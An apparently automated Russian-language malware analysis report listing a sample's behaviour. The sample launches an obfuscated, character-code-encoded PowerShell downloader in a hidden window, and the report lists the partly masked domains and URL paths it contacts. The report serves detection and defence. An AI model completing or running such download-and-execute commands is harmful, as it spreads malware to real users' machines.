Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " \" $( SEt 'oFS' '' ) \" + [StRINg]( (36 , 70, 112 , 114, 61 , 110,101,119 , 45,111, 98 , 106, 101 ,99,116,32 ,78 , 101 , 116 ,46, 87,101 ,98 , 67 , 108, 105 , 101 ,110 , 116 , 59, 36 , 84,81 ...
Сетевая активность
Подключается к
- 'st###smoking.ro':80
- 'st###smoking.ro':443
- 'bo##i.top':80
- 'ds###ttoo.com':80
- 'an##bra.ru':80
TCP
Запросы HTTP GET
- http://www.st###smoking.ro/GpQh4/
- http://www.bo##i.top/C/
- http://ds###ttoo.com/28hUd/
- http://www.an##bra.ru/DOQjpU/
Другие
- 'st###smoking.ro':443
UDP
- DNS ASK by###snap.com
- DNS ASK st###smoking.ro
- DNS ASK bo##i.top
- DNS ASK ds###ttoo.com
- DNS ASK an##bra.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " \" $( SEt 'oFS' '' ) \" + [StRINg]( (36 , 70, 112 , 114, 61 , 110,101,119 , 45,111, 98 , 106, 101 ,99,116,32 ,78 , 101 , 116 ,46, 87,101 ,98 , 67 , 108, 105 , 101 ,110 , 116 , 59, 36 , 84,81 ...' (со скрытым окном)
